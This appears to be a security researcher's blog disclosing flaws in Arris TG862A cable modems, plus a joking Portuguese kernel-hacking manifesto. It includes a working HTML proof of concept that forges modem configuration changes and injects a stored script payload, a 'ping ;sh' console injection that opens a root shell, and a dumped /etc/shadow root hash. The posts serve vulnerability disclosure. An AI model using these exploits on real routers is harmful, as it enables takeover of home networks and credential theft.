


Persistent XSS and CSRF in TG862A Arris Modem


Continuing with the bugs I found in the Arris modem series: the TG862A (TS0705125D_031115_MODEL_862_GW) Arris modem has some obvious persistent XSS and CSRF bugs in the ‘Firewall’ area.

In the Firewall -> Virtual Servers section
firewall-area

We can add a new ‘Virtual Server’
add-virtual-serv

And put the malicious Javascript code on the “Description” field
add-virtual-server-xss

After clicking the button to add a new virtual server, the page makes the requests that create it, and when the “Virtual Servers” page containing the malicious JavaScript is loaded, the alert pop-up is shown.
xss-popup

The application doesn’t have any kind of protection against CSRF attacks, and the code used for the PoC is below. 😉

<html>
  <body>
    <script>
      // Defender's note: this is a cross-site request forgery (CSRF) request.
      // The page hosting it is served from some other origin, yet it asks the
      // browser to contact the modem at 192.168.0.1 with the victim's cookies
      // attached (withCredentials), so the modem cannot distinguish it from a
      // request the logged-in user made. Whether the modem checks "_n" is not
      // shown here; it is the same value (26020) in all thirteen requests on
      // this page, so it is not acting as a per-request token, and "_" looks
      // like a millisecond timestamp rather than a secret. Device-side fix:
      // accept state changes only over POST with a per-session, unpredictable
      // anti-CSRF token, validate the Origin/Referer header, and mark the
      // session cookie SameSite.
      function submitRequest()
      {
        var xhr = new XMLHttpRequest();
        // snmpGet with a single OID. The response is never read, and unless the
        // modem sends permissive CORS headers (not shown) it could not be read
        // cross-origin anyway; only the side effect on the device matters.
        xhr.open("GET", "http://192.168.0.1/snmpGet?oids=1.3.6.1.4.1.4115.1.20.1.1.2.2.1.5.12;&_n=26020&_=1448050502692", true);
        // Accept and Accept-Language are CORS-safelisted headers, so setting
        // them does not trigger a preflight.
        xhr.setRequestHeader("Accept", "text/plain, */*; q=0.01");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
        xhr.withCredentials = true;
        // body is the empty string, so aBody has length 0 and the loop never
        // runs; a GET request carries no body, so the Blob below changes
        // nothing about what is sent.
        var body = "";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
      }
      // Fired as soon as the script runs; no user interaction is required.
      submitRequest();
    </script>
    <script>
      // Second credentialed cross-origin GET to snmpGet, identical in shape to
      // the first: the victim's cookies for 192.168.0.1 are attached by the
      // browser, the response is never read, and the "_n=26020" value is the
      // same as in every other request on this page. A read via GET is
      // harmless by itself; it only illustrates that nothing ties the request
      // to the victim's session.
      function submitRequest2()
      {
        var xhr = new XMLHttpRequest();
        // Different OID from submitRequest; what it denotes is not shown here.
        xhr.open("GET", "http://192.168.0.1/snmpGet?oids=1.3.6.1.4.1.4115.1.20.1.1.2.2.1.3.12;&_n=26020&_=1448050509837", true);
        xhr.setRequestHeader("Accept", "text/plain, */*; q=0.01");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
        xhr.withCredentials = true;
        // Empty body: the loop below never executes and GET has no body anyway.
        var body = "";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
      }
      submitRequest2();
    </script>
    <script>

      // First write: the same credentialed cross-origin GET pattern, but to
      // snmpSet, i.e. this request changes modem state. A state-changing
      // operation reachable by a plain GET, with no unpredictable per-session
      // token in the URL ("_n=26020" is constant across the page), is exactly
      // what makes it forgeable from any site the victim visits. Mitigation:
      // POST-only writes, anti-CSRF token, Origin validation, SameSite cookies.
      function submitRequest3()
      {
        var xhr = new XMLHttpRequest();
        // Sets the OID ...4.12.1.11.1 to "5" (the trailing ";2;" is part of the
        // modem's value encoding; its meaning is not documented on this page).
        xhr.open("GET", "http://192.168.0.1/snmpSet?oid=1.3.6.1.4.1.4115.1.20.1.1.4.12.1.11.1=5;2;&_n=26020&_=1448050512017", true);
        xhr.setRequestHeader("Accept", "*/*");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
        xhr.withCredentials = true;
        // Empty body: the loop below never executes and GET has no body anyway.
        var body = "";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
      }
      submitRequest3();
    </script>
    <script>
      // This is where CSRF and stored XSS meet. The value written is the
      // URL-encoded string test<script>alert(1)</script>; per the write-up
      // above it lands in the Virtual Server "Description" field and is later
      // rendered into the firewall page without HTML encoding, so it executes
      // for whoever views that page. Two independent fixes apply: reject or
      // encode the value on output (stored XSS), and do not accept writes over
      // an un-tokened GET (CSRF).
      function submitRequest4()
      {
        var xhr = new XMLHttpRequest();
        // OID ...4.12.1.2.1 -- presumably the Description column; inferred from
        // the prose, not shown in the code.
        xhr.open("GET", "http://192.168.0.1/snmpSet?oid=1.3.6.1.4.1.4115.1.20.1.1.4.12.1.2.1=test%3Cscript%3Ealert(1)%3C%2Fscript%3E;4;&_n=26020&_=1448050516100", true);
        xhr.setRequestHeader("Accept", "*/*");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
        xhr.withCredentials = true;
        // Empty body: the loop below never executes and GET has no body anyway.
        var body = "";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
      }
      submitRequest4();
    </script>
    <script>
      // Credentialed cross-origin GET to snmpSet, writing "666" with a ";66;"
      // suffix to OID ...4.12.1.3.1. What this column represents is not shown
      // on this page. The defect being demonstrated is the same as for every
      // snmpSet request here: a state change accepted over GET with no
      // per-session anti-CSRF token ("_n=26020" never varies).
      function submitRequest5()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("GET", "http://192.168.0.1/snmpSet?oid=1.3.6.1.4.1.4115.1.20.1.1.4.12.1.3.1=666;66;&_n=26020&_=1448050518619", true);
        xhr.setRequestHeader("Accept", "*/*");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
        xhr.withCredentials = true;
        // Empty body: the loop below never executes and GET has no body anyway.
        var body = "";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
      }
      submitRequest5();
    </script>
    <script>
      // Credentialed cross-origin GET to snmpSet, writing "666;66;" to OID
      // ...4.12.1.4.1 (meaning not documented here). Same forgeability issue
      // as the other writes on this page: GET + cookies + no unpredictable
      // token. The modem should require POST with an anti-CSRF token and
      // check the Origin header for these endpoints.
      function submitRequest6()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("GET", "http://192.168.0.1/snmpSet?oid=1.3.6.1.4.1.4115.1.20.1.1.4.12.1.4.1=666;66;&_n=26020&_=1448050530861", true);
        xhr.setRequestHeader("Accept", "*/*");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
        xhr.withCredentials = true;
        // Empty body: the loop below never executes and GET has no body anyway.
        var body = "";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
      }
      submitRequest6();
    </script>
    <script>
      // Credentialed cross-origin GET to snmpSet, writing "1;2;" to OID
      // ...4.12.1.5.1 (meaning not documented here). The browser attaches the
      // victim's cookies for 192.168.0.1; the response is discarded. Same
      // CSRF root cause as the rest of the page: a GET that mutates state and
      // carries nothing the attacker could not predict.
      function submitRequest7()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("GET", "http://192.168.0.1/snmpSet?oid=1.3.6.1.4.1.4115.1.20.1.1.4.12.1.5.1=1;2;&_n=26020&_=1448050533971", true);
        xhr.setRequestHeader("Accept", "*/*");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
        xhr.withCredentials = true;
        // Empty body: the loop below never executes and GET has no body anyway.
        var body = "";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
      }
      submitRequest7();
    </script>
    <script>
      // Credentialed cross-origin GET to snmpSet, writing "1;2;" to OID
      // ...4.12.1.6.1 (meaning not documented here). Structurally identical to
      // the preceding write; the only thing that changes across these scripts
      // is the OID and value, which is itself a sign that the endpoint applies
      // no request-specific protection.
      function submitRequest8()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("GET", "http://192.168.0.1/snmpSet?oid=1.3.6.1.4.1.4115.1.20.1.1.4.12.1.6.1=1;2;&_n=26020&_=1448050539233", true);
        xhr.setRequestHeader("Accept", "*/*");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
        xhr.withCredentials = true;
        // Empty body: the loop below never executes and GET has no body anyway.
        var body = "";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
      }
      submitRequest8();
    </script>
    <script>
      // Credentialed cross-origin GET to snmpSet, writing the value "$C0A8000A"
      // (URL-encoded as %24C0A8000A) to OID ...4.12.1.7.1. C0A8000A reads as
      // the hex form of an IPv4 address (192.168.0.10); presumably the LAN host
      // the virtual-server entry points at -- inferred, not shown on this page.
      // From a defender's view this is the most consequential write: a forged
      // request can redirect inbound port forwarding, so this endpoint in
      // particular needs POST + anti-CSRF token + Origin validation.
      function submitRequest9()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("GET", "http://192.168.0.1/snmpSet?oid=1.3.6.1.4.1.4115.1.20.1.1.4.12.1.7.1=%24C0A8000A;4;&_n=26020&_=1448050545672", true);
        xhr.setRequestHeader("Accept", "*/*");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
        xhr.withCredentials = true;
        // Empty body: the loop below never executes and GET has no body anyway.
        var body = "";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
      }
      submitRequest9();
    </script>
    <script>
      // Credentialed cross-origin GET to snmpSet, writing "666;66;" to OID
      // ...4.12.1.9.1 (meaning not documented here). Same CSRF condition as the
      // other writes: cookies attached by the browser, state change over GET,
      // constant "_n=26020" rather than a per-session token.
      function submitRequest10()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("GET", "http://192.168.0.1/snmpSet?oid=1.3.6.1.4.1.4115.1.20.1.1.4.12.1.9.1=666;66;&_n=26020&_=1448050550616", true);
        xhr.setRequestHeader("Accept", "*/*");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
        xhr.withCredentials = true;
        // Empty body: the loop below never executes and GET has no body anyway.
        var body = "";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
      }
      submitRequest10();
    </script>
    <script>
      // Credentialed cross-origin GET to snmpSet, writing "666;66;" to OID
      // ...4.12.1.10.1 (meaning not documented here). Identical mechanics to
      // the other snmpSet requests on this page; the defect is the endpoint's
      // acceptance of state changes over an un-tokened GET, not anything
      // specific to this OID.
      function submitRequest11()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("GET", "http://192.168.0.1/snmpSet?oid=1.3.6.1.4.1.4115.1.20.1.1.4.12.1.10.1=666;66;&_n=26020&_=1448050556630", true);
        xhr.setRequestHeader("Accept", "*/*");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
        xhr.withCredentials = true;
        // Empty body: the loop below never executes and GET has no body anyway.
        var body = "";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
      }
      submitRequest11();
    </script>
    <script>
      // Credentialed cross-origin GET to snmpSet, writing "1;2;" to OID
      // ...4.12.1.11.1 -- the same OID the first snmpSet request on this page
      // set to "5;2;", now set to "1;2;". What the two values mean is not
      // shown. The CSRF root cause is unchanged: GET, cookies, no
      // unpredictable per-session token.
      function submitRequest12()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("GET", "http://192.168.0.1/snmpSet?oid=1.3.6.1.4.1.4115.1.20.1.1.4.12.1.11.1=1;2;&_n=26020&_=1448050559849", true);
        xhr.setRequestHeader("Accept", "*/*");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
        xhr.withCredentials = true;
        // Empty body: the loop below never executes and GET has no body anyway.
        var body = "";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
      }
      submitRequest12();
    </script>
    <script>
      // Last credentialed cross-origin GET to snmpSet. Unlike the preceding
      // writes it targets OID ...1.1.9.0, outside the ...4.12.1 row the others
      // modify; its role is not documented on this page. Note that all
      // thirteen scripts fire independently and in parallel on page load --
      // nothing waits for an earlier request to finish -- so any ordering the
      // device requires between these writes is left to chance.
      function submitRequest13()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("GET", "http://192.168.0.1/snmpSet?oid=1.3.6.1.4.1.4115.1.20.1.1.9.0=1;2;&_n=26020&_=1448050563269", true);
        xhr.setRequestHeader("Accept", "*/*");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
        xhr.withCredentials = true;
        // Empty body: the loop below never executes and GET has no body anyway.
        var body = "";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
      }
      submitRequest13();
    </script>
  </body>
</html>

Regards.

Update: the vulnerabilities are still present in TS0705125E_111615_MODEL_862_GW.


Written by m0nad

novembro 20, 2015 at 9:29 pm


Command injection in Arris modems


Inspired by Bernardo Rodrigues’ publication for the NullByte Conference on his blog (http://w00tsec.blogspot.com.br/2015/11/arris-cable-modem-has-backdoor-in.html) about some command injections (backdoors?) in the restricted shell of Arris modems, I decided to publish another command injection that he may not have noticed, in the ‘ping’ feature.

Arris TG862A Command Injection
--
Arris TG862A has a console (ARRIS Console) that, within the "System"
context, has a command injection in the ping feature. The password for
the ARRIS Console is the "password of the day".

Version affected
--
Hardware Model:         TG862A
Firmware Name:          TS0705125_062314_MODEL_862_GW
Firmware Revision:      7.5.125
Base Version:           2.0.5.38

PoC
--
```
$ telnet 192.168.100.1
Trying 192.168.100.1...
Connected to 192.168.100.1.
Escape character is '^]'.



                           `!MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM::~
                               ``!MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM!:~` ~   
                                    !MMMMMMMMMMMMMMMMMMMMMMM!:`     :~~     
                                     :MMMMMMMMMMMMMMMM!~        :~~~~       
                                   .:MMMMMMMMMM!:~           ~~~~~~         
                              ..:MMMMMMM!:~`             :~~~~~~~           
                         .:MMMMMM:~`                ::~~~~~~~~~             
                    .:MMMMM:~                    .!!!!!!: ~~~~              
              ..:MMM:~`                         .!!!!`      ~               
        ..:MM:~`                                !!`                         
   .:M:~` 


        AA              RRRRRRR          RRRRRRR          III         SSSSS  
       AAAA             RRRRRRRRR        RRRRRRRRR        III       SSSSSSSSS
      AAAAAA            RRR    RRR       RRR    RRR       III      SSS    SS 
     AAA  AAA           RRR   RRRR       RRR   RRRR       III       SSSS     
    AAA    AAA          RRRRRRRRR        RRRRRRRRR        III         SSSSSS 
   AAAAAAAAAAAA         RRR  RRR         RRR  RRR         III            SSSS
  AAA        AAA        RRR   RRR        RRR   RRR        III       SS    SSS
 AA            AA       RRR    RRR       RRR    RRR       III      SSSSSSSSS 
A                A      RRR       R      RRR       R      III        SSSSS   


          ARRIS Enterprises, Inc. 2014 All rights reserved




Enter password> 

Spawning ARRIS Console

Firmware Revision:      7.5.125
[  1] Console> system
[  2] System> ping ;sh
ping -I wan0 ;sh 
BusyBox v1.15.2 (2014-06-23 08:08:11 EDT) multi-call binary

Usage: ping [OPTIONS] HOST



BusyBox v1.15.2 (2014-06-23 08:08:11 EDT) built-in shell (ash)
Enter 'help' for a list of built-in commands.

# cat /etc/shadow
root:$1$xQWhDWOr$FYNAc2DuT2Q45OY7s2R43/:10063:0:99999:7:::
# 
```

Credits
--
Victor N. Ramos Mello <victornrm () gmail com>

Note: this bug is still active in the TS0705125D_031115_MODEL_862_GW firmware.

Written by m0nad

novembro 20, 2015 at 6:13 pm


Extreme Kernel Horser MANIFESTO


1 – Extreme Kernel Horser sempre usa a última versão do kernel, unstable!
2 – Extreme Kernel Horser não faz backup do kernel antigo.
3 – Extreme Kernel Horser testa sempre na própria máquina segundo a regra 1 e 2.
4 – Extreme Kernel Horser recompila kernel, e testa segundo a regra 1, 2 e 3.
5 – Extreme Kernel Horser programa módulo de kernel, e testa segundo a regra 1, 2 e 3.
6 – Extreme Kernel Horser modifica o kernel, e testa segundo a regra 1, 2, 3 e 4.
7 – Extreme Kernel Horser não é metodologia de desenvolvimento, é estilo de vida.
Happy Kernel Hacking 🙂

Written by m0nad

abril 5, 2011 at 1:35 pm
